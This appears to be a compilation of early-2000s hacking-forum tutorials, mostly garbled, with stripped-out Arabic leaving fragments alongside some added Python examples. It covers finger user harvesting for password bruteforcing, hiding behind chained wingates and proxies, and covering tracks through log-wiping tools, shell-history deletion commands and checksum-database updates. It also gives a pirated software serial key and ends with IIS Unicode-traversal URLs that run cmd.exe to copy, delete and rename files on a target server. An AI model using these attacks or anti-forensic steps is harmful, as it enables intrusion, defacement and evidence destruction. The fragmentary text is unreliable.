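            + struct.pack(">HHIH", NBSTAT, CLASS_IN, 0, len(rdata)) + rdata)


def demo():
    query = build_node_status_query(0x1337)
    reply = build_node_status_reply(query, [("HISHEM2", 0x00, "unique"),
                                            ("HISHEM2", 0x20, "unique"),
                                            ("WORKGROUP", 0x00, "group")], "00-0c-29-12-34-56")
    names, mac = parse_node_status_reply(reply, 0x1337)
    return [(n, SUFFIX.get(s, hex(s)), k) for n, s, k in names], mac
```

On the wire, sendto(query, (host, 137)) on a UDP socket and hand the datagram that comes back to parse_node_status_reply; a host that answers is one the RestrictAnonymous and filtering steps above have not yet reached.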

" "Finger
Post by LAMeR:

Finger, port 79

>================<
1.1 Introduction
1.2 What Finger is
1.3 Using Finger
1.4 Finger and passwords
1.5 Finger bouncing
1.6 Protecting yourself
1.7 Closing

1.1:
>=========<
.

1.2 Finger
>===================<
Finger runs on port 79 and hands out a kind of businesscard for a user: a remote user sends a request to the Finger daemon on port 79 and gets back what the server knows about that user. Admins usually leave it running. The Finger daemon answers anyone who says "Finger me!" with the businesscard. Nothing else is needed: no portscans, the server only sees a finger request. Finger is where you start with a server.

1.3 Finger
>=================<
Check that port 79 is open (superscan against http://www.foobar.com/, Port 79). The request goes from a client to the Finger daemon; if no Finger client is installed, Telnet will do:
Telnet (client) --------request-------> Finger Daemon (in Server)
From MS DOS:
telnet www.foobar.com 79
then type the request. On the "@" and the "www": the request finger@anyname.com means the Finger daemon of anyname.com, not the web site, so write it as finger @anyname.com rather than finger www.anyname.com. From a unix shell:
finger @foobar.com
lists who is on foobar.com:

Login    Name              Tty       Idle   When        Where
root     foobar sys        console   17d    Tue 10:13   node0ls3.foobar.com
<.......> Amos Amanda      <.......> <.......>
          Anderson Kenneth
          Bright Adrian
          Doe John
<.......> Johnson Peter    <.......> <.......>
          Mitnick Kevin
          Munson Greg
          Orwell Dennis

Login is the account name and Name the full name; Tty is the terminal type, Idle the idle time, When the login time and Where the host the user came from. To see one user (Johnson Peter):
finger johnson@foobar.com

1.4 Finger
>====================================================<
Finger gives you user names. About 50% of users pick weak passwords, so from the list you can bruteforce access with a wordlist and a password cracker, for example the tools at http://www.thehackerschoice.com/ or VLAD's pwscan.pl; the wordlist should hold the words people actually use. The Admin (root) account is the one most watched. Try also:
finger secret@foobar.com
Some Finger daemons answer with information on an account called "secret"; try "test", "temp" and "0000" too. And:
finger .@foobar.com
finger 0@foobar.com
on some Finger daemons list every account! The RFC does not say a Finger daemon should, but many do!

1.5 Finger
>======================================<
Finger bouncing: instead of fingering "www.victim.com" directly, send the finger through "www.host.com":
finger @host.com@victim.com
host.com sends the finger to victim.com for you, and victim.com's log shows http://www.host.com/, not you. Chain several Hosts and the trace has to go through all of them. Finger bouncing only works where the Host allows it, and ... !

1.6
>=======================<
Turn the Finger daemon off, or restrict who may access it. Choose passwords that are not in any wordlist, so bruteforce against the names Finger gives away fails. Keep " " out of the Finger daemon.
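A finger client and listing parser, as an added example written for this page (not LAMeR's code). split_query() follows RFC 1288, under which the client opens port 79 on the rightmost host of user@hop@final and sends the rest of the query for that host to forward; parse_listing() reads the column-aligned listing of the kind shown above, and harvest() pulls out what an attacker actually takes from it. The sample listing is constructed. fetch() does the real TCP exchange and is not run by the tests.

```python
import socket


def split_query(query):
    """'user@hop@final' -> (host to connect to, request line to send).

    RFC 1288: the client connects to the rightmost host and sends everything to
    the left of that '@'; for '@host.com@victim.com' it sends '@host.com' to
    victim.com, which then fingers host.com on the client's behalf.
    """
    if "@" not in query:
        raise ValueError("need user@host")
    rest, _, host = query.rpartition("@")
    return host, (rest + "\r\n").encode("ascii")


def fetch(query, timeout=5):
    """Send the request over TCP 79 and return the raw reply (network; not tested)."""
    host, request = split_query(query)
    with socket.create_connection((host, 79), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while chunk := s.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks).decode("latin-1")


def parse_listing(text):
    """Parse a column-aligned finger listing into dicts keyed by the header names.

    The header's column starts define the slices, so values containing spaces
    (full names, 'Tue 10:13') survive and empty fields (no Idle time) stay empty.
    """
    lines = [l for l in text.splitlines() if l.strip()]
    header, rows = lines[0], lines[1:]
    cols = header.split()
    starts = [header.index(c) for c in cols]
    bounds = list(zip(starts, starts[1:] + [None]))
    return [{c: row[a:b].strip() for c, (a, b) in zip(cols, bounds)} for row in rows]


def harvest(records):
    """Login names for the wordlist run, plus who has been idle for days."""
    logins = [r["Login"] for r in records]
    idle_days = [r["Login"] for r in records if r["Idle"].endswith("d")]
    return logins, idle_days


# Constructed listing in the usual finger layout.
_WIDTHS = (9, 17, 9, 6, 11)


def _row(*cols):
    return "".join(c.ljust(w) for c, w in zip(cols, _WIDTHS)) + cols[-1]


SAMPLE_LISTING = "\n".join([
    _row("Login", "Name", "Tty", "Idle", "When", "Where"),
    _row("root", "foobar sys", "console", "17d", "Tue 10:13", "node0ls3.foobar.com"),
    _row("amos", "Amos Amanda", "ttyp0", "2:11", "Tue 09:40", "dial-7.isp.co.uk"),
    _row("kmitnick", "Mitnick Kevin", "ttyp3", "", "Tue 11:02", "pm3-12.isp.co.uk"),
]) + "\n"
```

The same parser works on the output of a real fetch("@foobar.com") as long as the daemon prints the standard aligned table; daemons that print one free-form card per user need a different parser.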

" " NET

Post:

The net command is the NT command-line tool for accounts, services, shares and sessions. net (also net ? or net /?) lists the subcommands; net help <command>, for example net help accounts, shows the syntax of one.
Commands that ask for confirmation take /y (yes) or /n (no): net stop server asks before stopping the Server service, net stop server /y does not.
A service name containing a space must be quoted ("Service Name"): for the Net Logon service, net start "net logon".
net accounts sets the password policy: the maximum password age is unlimited or 1 to 49,710 days; the default is 90.
net file lists the shared files that are open; net file <id> /close closes one.
net user <name> * prompts for the password instead of taking it on the command line.
The text's example of a domain account is Sales\Ralphr.
" "secure shell


Post by ACID BURN_EG:

Secure Shell :: SSh
===============
secure shell is a program for logging in to a remote machine (a remote connection) and a replacement for rlogin, rsh and rcp; it runs over tcp.

:: secure shell versus the r-commands ::
==================================================
* The BSD r-commands (rlogin, rsh and rcp) trust the remote host, up to root access, and so give unauthorized access to systems ( ... ); ssh gives authorized access to systems.

:: what ssh protects against ::
===========================================
-1 ip spoofing: ssh knows the host by its key, so a faked address, even one that looks local, does not get a session.
-2 DNS spoofing.
-3 .
-4 tampering with the stream: if the connection is interfered with, ssh is disconnected.
ssh encrypts with three-key triple-DES, DES, RC4-128, TSS or Blowfish; there is also encryption of type "none", which should never be used! With ssh, ip spoofing and DNS spoofing do not get anyone in.

" "Buffer Overflows


Post by LAMeR:
.. Buffer Overflows

Contents:
-1 Buffer Overflow
<--------------------------
-2 Process
<-----------------
-3 Memory management
<--------------------------------
-4 Exploiting a Buffer Overflow
<----------------------------------
*

-1 Buffer Overflow
<>-----------------------
A Buffer Overflow is the most common hole there is. The 'code red' worm used a Buffer Overflow in IIS (MS web server), and Buffer Overflows have been known for about 20 years.
Example: a program reserves room for 15 characters for a name and asks the user for it; the user types 25 characters, 10 more than the buffer holds; the extra characters "Overflow" into whatever follows in memory.
The memory looks like this:

<var1><var2><vname><Other things in memory>
 10b    6b    15b

(var1, var2 and vname are variables; vname holds 15 characters.) Write "abcabcabcabcabcabcabcabcabc" into vname and memory becomes:

somevalue2avalusabcabcabcabcabcabcabcabcabc
<var1    ><var2><vname        ><other things go here>

vname is "overflowed" and the "other things in memory" have been overwritten by the tail of the input. Whether that just crashes the program or lets you take it over depends on what those other things are; the examples here are for linux.

-2 Process:
<>----------------
A Process is a running program. "Multi-process" means several run at once and the CPU switches between them .. (: .

-3 Memory management:
<>------------------------------
Operating systems give each process its own (virtual memory) ( ); the Operating System keeps one process's memory apart from the others' ( ). Within a process there are separate regions ( ) for the code, the data and the stack ( ).

-4 Buffer Overflow
<>---------------------------------
A program running as Root that reads input ( ) without checking its length can be overflowed ( ); what the overflow overwrites decides what runs next, and it runs with Root's rights. Buffer Overflows are found by feeding long input and seeing what breaks; many have been found and exploited, and more Buffer Overflows keep turning up.

" CGI "


Post by King_abdo:

CGI

(1) What CGI is
CGI = COMMON GATEWAY INTERFACE: the interface between the web server and the programs it runs. The browser talks to the server with HTTP over TCP/IP, normally on port 80, in two directions: -1 the request, -2 the response.
Request types:
-1 GET
-2 POST
-3 PUT

(2) ...
HTTP is one protocol among the others the server may speak: FTP, TELNET.

" !"
Post:

==========
.. everything you do on a system ends up in its log files .. and the admin reads them ! !!
************************
Exploits: an exploit you download is public ( ), and the admin knows it too; a 0day is one nobody else has .. !! !! !! .. a hacker finds his own ..
************************
The 8 sections of this text:
=================
: ( )
: "Paranoid"
: why "Paranoid" !
: ( )
: LoGs ( )
: Admins: syslog configuration and logfile, checksum checking software
:
: ........ !!! ...
:
=======
*************
.. .. the Hacker .. ( )
"Paranoid"
***************************
Paranoia ( ): assume everything you do is logged and watched !! .. and never relax .. !! .. ( ) .. !! ! .. ( ) .. .. .. !! ..
every log counts .. the hacker who is 100% sure of himself is the one who gets caught ..
"Paranoid"
*********************
Being "Paranoid" ... ( ) ... .. .. ( ) .. !
!******************************************
.. : !!!!
:
=========
******
..
:
***********
The SysAdmin .. (= hacker .. ..
( )
>-- sensitive data <-
Encryption:
MsDos: SFS v.17, SecureDrive 1.4b; Amiga: EnigmaII v1.5; Unix: CFS v1.33 (Triple DES, IDEA, Blowfish (32 rounds)), file2file; PGP v2.6.x (Unix System).
:
SSH, DES Login .. .. .. ..
Passwords: 8 characters (4 to 8) .. ( ) .. !!
CD, HD .. document files .. !!
:
=================
: , ,
:
keyboard .. !! !!! !! !!! ...
" "
!!!
:
===================
\\\ :
..
telnet security .. !!!! .. ==< >----

: LoGS
============
There are 3 log files:
WTMP: log on/off (log in/logout) with tty and host
UTMP: who is logged in now !
LASTLOG: last logins ** ( )
telnet, ftp and rlogin all write to them ..
99.9% of ( .. ) are caught through the logfiles ..
Tools: ZAP (or ZAP2) ..
Editing them needs root; the log files ( ) are, by default, in:
UTMP    : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
WTMP    : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log
and $home/.lastlog
:
=======
.. !!!
/tmp and $HOME/
Shell History in $HOME:
History files:
sh   : .sh_history
csh  : .history
ksh  : .sh_history
bash : .bash_history
zsh  : .history
Backup Files:
~*, dead.letter, *.bak
To have the History files removed at logout:
mv .logout save.1
echo rm -rf .history>.logout
echo rm -rf .logout>>.logout
echo mv save.1 .logout>>.logout
======================
encrypted partition ( ) .. the admin ..
..
.. shells left in the background !!! .. parameters ...
telnet http://www.host.com/ 23 :
telnet
open
http://www.host.com/
..
backdoors ( sub7 )
:
===============================
*******
sniffer ..
:
**********************
( ) hacker ... !!!
...
* ( ) ( ) the admin ( ) .. output of a sniffer .. netstat shows you online !! GateWay Server
* A gateway server in between: the wtmp and lastlogs on the gateway server .. .. gateway server .. ==< ( root access ) Dialup server .. (= hacked system
: dialup hacking
server ( ) ( ) dialup servers !
:
lOGs ..**************************************************
..
:
- 1 : LSOF (List Open Files)
- 2 ( ) - touch /tmp/check, then "find / -newer /tmp/check -print"
: <- <- <-
log files: /usr/adm, /var/adm, /var/log; a loghost (xx@loghost) .. loghost
Editing logfiles with a text editor: wc, then "head -LineNumbersMinus10" (head - the last 10 lines)
accounting: acct-cleaner from zhart
wtmpx and utmpx !!!
.. ( ) =(
syslog configuration and logfile************************************
the syslog function .. syslog can log to other hosts ... hosts; syslog is configured in /etc/syslog.conf
******************************
cron: /var/spool/cron/crontabs . Root . "crontab -l root" . ~/bin . sniffer .
Security tools admins run: tiger, cops, spi, tripwire, l5, binaudit, hobgoblin, s3 etc.
, :
( )
back door Admins****************************
, .
:
.forward, alias, sulog, su, root group (admin, root, wheel, etc), passwd (chid.c, changeid.c), .history/.sh_history/.bash_history, .profile/.login/.bash_profile alias .
checksum checking software
************************
( checksum . )
checksum
SOFTWARE  : STANDARD PATH                              : BINARY FILENAMES
tripwire  : /usr/adm/tcheck, /usr/local/adm/tcheck     : databases, tripwire
binaudit  : /usr/local/adm/audit                       : auditscan
hobgoblin : ~user/bin                                  : hobgoblin
raudit    : ~user/bin                                  : raudit.pl
l5        : compile directory                          : l5

NTFS checksum ( CD ) ...
( ) ..
- 1 "tripwire -update /bin/target"
- 2 ( checksum )
*******************
( ) .. admins' startup files: profile, .cshrc, .login, .logout .
:
=========
***************************
( ) administrators ( ) : administrators vs hacker ==< ... ( admins, hacker, administrator, administrator ) ..

:
=========
:
**************
: !!!! : .. .. ( ) ..
: !!! : .. .. ( ) .. !
:
========
******************************
Change    - Changes fields of the logfile to anything you want
Delete    - Deletes, cuts out the entries you want
Edit      - real Editor for the logfile
Overwrite - just Overwrites the entries with zero-value bytes.
Don't use such software (f.e. zap) - it can be detected!
--------------------------------------------------------------
LOG MODIFIER
++++++++++
ah-1_0b.tar   Changes the entries of accounting information
clear.c       Deletes entries in utmp, wtmp, lastlog and wtmpx
cloak2.c      Changes the entries in utmp, wtmp and lastlog
invisible.c   Overwrites utmp, wtmp and lastlog with predefined values, so it's better than zap. Watch out, there are numerous inv*.c!
marryv11.c    Edit utmp, wtmp, lastlog and accounting data - best!
wzap.c        Deletes entries in wtmp
wtmped.c      Deletes entries in wtmp
zap.c         Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!
-------------------------------------------------------------------------------------
:
=========
**********
.. .. !! ( ) ..
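Detecting what the "Overwrite ... with zero-value bytes" tools leave behind, as an added example written for this page from the defender's side (not code from the text): parse a Linux wtmp file record by record, flag all-zero records sandwiched between live ones, and flag logout records whose login is missing. The record layout is glibc's struct utmp (384 bytes); the sample file is constructed, with the intruder's login record zeroed as zap.c would leave it.

```python
import struct

# glibc struct utmp on Linux (384 bytes): ut_type, pad, ut_pid, ut_line[32], ut_id[4],
# ut_user[32], ut_host[256], ut_exit{2 shorts}, ut_session, ut_tv{sec,usec}, ut_addr_v6[16], unused[20]
UTMP_FMT = "<hxxi32s4s32s256shhiii16s20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)   # 384
USER_PROCESS, DEAD_PROCESS = 7, 8


def pack_record(ut_type, pid, line, user, host, ts):
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), line[-4:].encode(),
                       user.encode(), host.encode(), 0, 0, 0, ts, 0, b"", b"")


def parse_records(data):
    """Split a wtmp/utmp image into dicts; 'zeroed' marks a record that is all NUL bytes."""
    recs = []
    for idx in range(len(data) // UTMP_SIZE):
        chunk = data[idx * UTMP_SIZE:(idx + 1) * UTMP_SIZE]
        ut_type, pid, line, _, user, host, _, _, _, sec, _, _, _ = struct.unpack(UTMP_FMT, chunk)
        recs.append({"index": idx, "type": ut_type, "pid": pid,
                     "line": line.split(b"\0", 1)[0].decode(),
                     "user": user.split(b"\0", 1)[0].decode(),
                     "host": host.split(b"\0", 1)[0].decode(),
                     "time": sec, "zeroed": chunk == bytes(UTMP_SIZE)})
    return recs


def zapped_indices(recs):
    """All-zero records followed by live ones.

    A real record always has a non-zero ut_type, so a zero block in the middle
    of the file is an entry that was wiped; a zero block at the very end could
    just be preallocated space and is not reported.
    """
    last_live = max((r["index"] for r in recs if not r["zeroed"]), default=-1)
    return [r["index"] for r in recs if r["zeroed"] and r["index"] < last_live]


def orphan_logouts(recs):
    """DEAD_PROCESS records on a tty with no preceding USER_PROCESS: the login was cut out."""
    open_lines, orphans = set(), []
    for r in recs:
        if r["type"] == USER_PROCESS:
            open_lines.add(r["line"])
        elif r["type"] == DEAD_PROCESS:
            if r["line"] in open_lines:
                open_lines.discard(r["line"])
            else:
                orphans.append((r["index"], r["line"]))
    return orphans


def build_sample():
    """Constructed wtmp: two sessions, then the intruder's login record zeroed out."""
    t0 = 1041379200                       # 2003-01-01 00:00:00 UTC
    recs = [pack_record(USER_PROCESS, 1201, "tty1", "root", "", t0),
            pack_record(USER_PROCESS, 1337, "pts/0", "kevin", "dial-7.isp.co.uk", t0 + 60),
            pack_record(DEAD_PROCESS, 1337, "pts/0", "", "", t0 + 900),
            pack_record(DEAD_PROCESS, 1201, "tty1", "", "", t0 + 3600)]
    recs[1] = bytes(UTMP_SIZE)            # what zap.c leaves behind
    return b"".join(recs)
```

On a live system feed parse_records(open("/var/log/wtmp", "rb").read()) to the two checks; tools from the "Delete" and "Edit" rows of the table above leave no zero block, which is why the file's checksum and a copy on a loghost are the real defence.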

" ) ( "
Post:

Proxy - Sock Host - Wingate
( )
++++++++++++++++++++++++++++++++++
Introduction to Proxy Server
=) proxy server (=
A proxy server is a server that stands between you and the site you visit and makes the request on your behalf. A LAN (Local Area Network) normally has a proxy server so that all its machines go out through it. When you ask for http://hackergurus.tk/ the proxy server fetches http://hackergurus.tk/ and hands the page to you, so the site sees the proxy server and not you. Pages come back a bit slower ... if you are lucky the proxy server is fast ! A proxy server also caches: a download you repeat (10 ...) comes from the proxy's copy; Refresh / Reload forces a fresh one.
Why use a Proxy Server
=) (=
!!! Your ISP (Internet Service Provider) sees all your Traffic; with a proxy server the site you visit logs the proxy's ip instead of your ip. You need the proxy server's address and its proxy port, for example cach.microsoft.com port 80 !! (..
-1 -2 -3 (kinds of proxy)
The proxy keeps Logs of what goes through it.
Introduction to Wingate
=) Wingate (=
WinGate is a proxy server and firewall for sharing one connection (dial up modem, ISDN, xDSL, cable modem, satellite connection, or even dedicated T1 circuits) among a Local Network, and anyone who can reach it can use it Anonymously. A wingate listens on port 23 (Telnet); the wingate Administrator often leaves it open to the outside, so a wingate can be used to ipspoof on ICQ and Mirc. open wingates are found by scanning, and the Admin usually does not DIScover that his is in use !!!
WinGate and SyGate keep Logs of the connections (the WinGate Server for 48 hours), and the ISP's logs exist too, so a wingate is not perfect cover.
How do I find Wingates
=) WinGate (=
Use a WinGate Scanner (search google, http://www.google.com/) on ip ranges or hostnames, for example the @home cable NetWork; or by Trial and Error, on Unix: telnet to port 23 of the wingate and see whether it answers with its prompt ( Guest, Anonymously ).
Introduction to Socks Host
=) Socks Host (=
A Socks Host works like a WinGate but on port 1080; explorer and netscape can be pointed at a Socks Host, and so can Mirc, to hide your ip behind its FireWall.
**********************
Ghost Surf
$$$$$$$$$$$$$$$$$$$$$$
Stealther
------------------------------------------
Neither of these is 100% anonymous.
" ) ( "
Post:
...
Chaining Proxies
Chaining wingates with Telnet

)------------------------------------------
A proxy is given as an ip or a Domain: a Proxy Ip Address or Domain plus a port ,,,
Lists of proxies:
http://www.multiproxy.org/anon_list.htm
http://tools.rosinstrument.com/proxy/
or the Yahoo Group P_R_O_X_Y@yahoogroups.com (subscribe by mailing P_R_O_X_Y-subscriber@yahoogroups.com and answering the Reply).
)------------------------------------------=========================
Test whether the proxy hides you:
http://www.privacy.net/
http://www.proxytester.com/
if they show your real Ip it is not anonymous !!!
=========================
*************************************
&&&&&&&&&&&&&&
proxy server
&&&&&&&&&&&&&&
With one Proxy (WebSite, IRC Chat, etc):

[User]>>>>>[Proxy]>>>>>[Web Pages]

---------------
Proxy Chaining
---------------

[User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination]

Destination = web page, Unix server, ftp server, etc. Proxy chaining works for any server: telnet, ftp, or http. Chaining is not 100% safe: every proxy keeps Logs, and the Administrator of the ftp server (say) has to go to each proxy's Logs in turn; the more links, the harder the trace ...

---------------
HTTP Chaining
---------------
HTTP chaining puts one Proxy Address in front of the next in the URL:
http://proxy.magusnet.com/-_-http://www.google.com
(the -_- is the separator that proxy understands !!!)
Chaining:
http://proxy.server1.com/-_-http://proxy.server2.com/-_-http://www.destination.com
or through an anonymizer:
http://anon.free.anonymizer.com/http://www.google.com
or with / as the separator:
http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.com
= proxy .....

---------------
Browser Chaining
---------------
In Internet Explorer a proxy is written as ip:port, for example 213.234.124.23:80 (213.234.124.23 is the proxy, 80 the port; your ISP's proxy looks the same). Tools > Internet Options > Connections > Settings, tick the proxy box and enter the Address (213.234.124.23) and the Port (80).
Chaining Proxies: the text suggests entering several addresses, Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port: 80. Note that Internet Explorer takes one proxy per protocol; a space-separated list is not a chain. A real chain needs each proxy to forward to the next, as in the URL form above or the Wingate chain below.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
&&&&&&&&&&&&&&
Wingates
&&&&&&&&&&&&&&
A Wingate is a proxy server that listens on port 23 (Telnet). Wingates online are easy to find, and the Admin usually has no idea his wingate is open !!!! Telnet to the ip on port 23. WinScan finds Wingates (Download it).
------------------------------
Chaining Wingates Using Telnet
------------------------------
A Wingate takes a host and port at its prompt (this is also how DoS through Telnet is done .....). Telnet to the first wingate on 23, give the next wingate at each prompt, and the real destination at the last:

C:\WINDOWS>telnet 61.133.119.130 23
Wingate> 203.207.173.166 23
Wingate> 213.17.99.45 23
Wingate> 10.65.212.7 23
WinGate> arbornet.org

Another run:

C:\Windows> telnet 61.133.119.130 23
Wingate>203.207.173.166 23
Wingate>135.245.18.167 23
Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected

" "Logs
> <
> : <

.
. Unix Multi-User Mode .
. Operation ) ( Linux ) . ( Unix
Unix
:
.

....
: ( LOG File ) ...
: ... ....

IP
........


Microsoft
Windows Linux Mac
....

96

..
: ...
) . ( LOG File .

) (Web servers

) (log files .
.
) (log file
.


.

- -
:
...
...

97

. WIN NT
...

:
) ( ) (
...
... ..

...
. :
lastlogin.
.
.
bash_history.

contactemail.


Tmp trash. . etc
.
lastlogin & .bash_history.
rm bash_history.
:
rm .bash_history
rm .bash_history
lastlogin. .
....
cpanel .
..
localhost :
...

:
....

98


...
...
...
...
: ... ....
..
.. ) ( HTTP Protocol


HTTP .... . SOCKS Protocol
.
.
Web Proxy Service (1 . HTTP Protocol .
WinSock Proxy Service (2 windows NT
telnet FTP WinSock
...... Protocol
. Socks Proxy Service (3 )SSL) Secure Sockets
Layers ) IIS) Internet Information Server Windows NT
FTP Telnet GopherIRC RealAudio POP3
firewall ... securiy .
..... TCP/IP
:
* )(Internationa Organization for Standardization
** . ransmission Control .
... Protocol TC

... :
Ping Traceroute, DNS lookup, Finger, Whois, LDAP, SNMP
... WIN NT : TCP/IP
...
UNIX Router .


... .
) . ( Router : .
.

99

.... ... .
. ...
... . :
Port 21 = FTP
Port 23 = Telnet
Port 25 = SMTP
Port 53 = DNS
Port 79 = Finger
Port 80 = HTTP
Port 110 = POP3
Port 111 = SunRPC
Port 139 = NetBIOS
Port 443 = SSL
Port 1080 = SOCKS
Port 8181 = IMail

.
: ... HTTPort .
.

TCP/IP HTTPort
( ) Proxy Server
ISP
) ) Proxy .
HTTPort
.
SOCKS
...

100

101

102

103

104

...
( Anonymous)
: ... 18
AnalogX Proxy
HTTP (web), HTTPS (secure web), POP3 (recieve mail), :
SMTP (send mail), NNTP (newsgroups), FTP (file transfer), and
Socks4/4a and partial Socks5 (no UDP) protocols! It works great with
Internet Explorer, Netscape, AOL, AOL Instant Messenger, Microsoft
!Messenger, and many more

http://www.analogx.com/files/proxyi.exe
PortBlocker :

:
PortBlocker is configured to block the most common types of servers
that might be on a system (FTP, HTTP, etc), so will not require any
modification for most users. If you are running a special server of some
sort, then you can easily add it's ports (either TCP or UDP) to it's list,
.and have them blocked and/or logged
Log unauthorized port access attempts and secure internal servers from
...internet access easily

105

PortBlocker
http://www.analogx.com/files/pblocki.exe

.
...
...
...
Proxy Log Analyzer :
:

MB 1.07 :
http://www.mechanicalminds.com/software/pla/setup.exe
ZIP archive instructions 818 kb
http://www.mechanicalminds.com/software/pla/pla.zip
.
Provides a space for you to type the address and port number of the
proxy server you want to use to gain access to the Internet over HTTP,
Secure, FTP, Gopher, and Socks protocols.

.
... .

" HTTP Port !!"


> <
>:<
:
-----------------------HTTPort 3snf
-----------------------:
-----------------------



,,,,,,,,,,,,
-----------------------
-----------------------http://www.angelfire.com/tv2/ssdd63/httport3snf.zip
-----------------------:
------------------------
FAHAD


Port mapping

Add

New mapping


Local port : 80
Remote host : webcache.bt.net
Remote port : 3128
OKY MAN

Proxy

,,,



Start


127.0.0.1
80

..

" " NeoTrace


><
>< DarK_HaCKeR :

..
..
..
..
Neo Trace Express
..
http://www.neoworx.com/download/NTX325.exe

:
XDQG-2ZKN-X2PA-KTRQ

" "
> <
> :<
:
=) (=
^^^^^^^^^^^^^^^^^^^

http://www.netcraft.com/

^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^

http://www.almodammer.com/

dfl;kjgk'dgjbumpipt@almodammer.com
Headers

^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Banners

..

Telnet Client
FTP 21

TELNET 23
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
HTTP
Hyper Text Transfer Protocol
8080 - 80
80 Telnet
GET /qwe HTTP/1.1
400

:
HEAD 127.0.0.1 HTTP/1.1
...
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
ping ip
!

ping ipsite
=ipsite

TTL=XXX
=XXX
:
OS            Version   Platform       TTL
Windows       9x/NT     Intel          32
Windows       9x/NT     Intel          128
Windows       2000      Intel          128
DigitalUnix   4.0       Alpha          60
Unisys        x         Mainframe      64
Linux         2.2.x     Intel          64
FTX(UNIX)     3.3       STRATUS        64
SCO           R5        Compaq         64
Netware       4.11      Intel          128
AIX           4.3.x     IBM/RS6000     60
AIX           4.2.x     IBM/RS6000     60
Cisco         11.2      7507           60
Cisco         12.0      2514           255
IRIX          6.x       SGI            60
FreeBSD       3.x       Intel          64
OpenBSD       2.x       Intel          64
Solaris       8         Intel/Sparc    64
Solaris       2.x       Intel/Sparc    255

: ) data list or packet ( Nodes TTL 1
tracert traceroute


tracert ip
=ip
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^

Windows



:
) N-Stealth ...(
=============
( Shadow Security Scanner

(
=============
( SuperScan
( List
------------------------------------------------------------------------Linux

Nmap
( Network Mapper )
Linux
//
:
/ nmap
Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
  -sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
  -sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
  -sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
  -p <range> ports to scan.  Example range: '1-1024,1080,6666,31337'
  -F Only scans ports listed in nmap-services
  -v Verbose. Its use is recommended.  Use twice for greater effect.
  -P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
  -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
  -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
  -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
  -iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
  --interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
!!!!!!!!!
.. man page

nmap -sS -O -vv almodammer.com
= almodammer.com

.......
^^^^^^^^^^^^^^^^^^^
=(=(

^^^^^^^^^^^^^^^^^^^
Linux Shell Account
Linux Shell
Linux
whois
Linux

man whois
------------------------------------------------------------------ google
http://www.google.com/search?q=whois&btnG=Google+Search
cgi
netcraft ..............

" "
> <
>>P @ LH@CKERZ :

1
http://
:
\
http://www.XXX.com/
/
2
3
4

5
6
7
8
9
10
11
11 10 :

12

:
.

" ) ( "
><
><sNiper_hEx :
) 13 ( -:
.
.
.
.
. CMD
.

. ECHO
CMD
.
Access Denied . . FTP
.

. TFTP
.
-

.

. NT4 / Win2k

IIS4.0 / IIS5.0

.
anonymous
person
.
.
-:

-1
.
.
-2
.
IIS4 / IIS5 CMD
.
. CMD
CMD

-:
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+md+c:\hEx

: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+rd+c:\hEx

:
http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.ex
e
:
http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+move+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.e
\xe+c:
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+del+c:\hEx.mdb
: http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+ren+c:\index.htm+hEx.htm
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+type+c:\hEx.txt
:
http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt
:

:
http://www.xxxx.com/msadc/hEx.mdb

.
-:
\:http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c
